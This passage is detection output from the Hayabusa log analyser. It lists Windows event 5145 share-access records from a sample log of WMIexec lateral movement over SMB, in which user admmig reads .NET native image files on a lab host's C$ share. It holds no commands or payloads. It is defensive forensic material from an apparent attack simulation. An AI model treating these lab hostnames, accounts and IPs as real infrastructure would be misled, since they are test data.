Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 
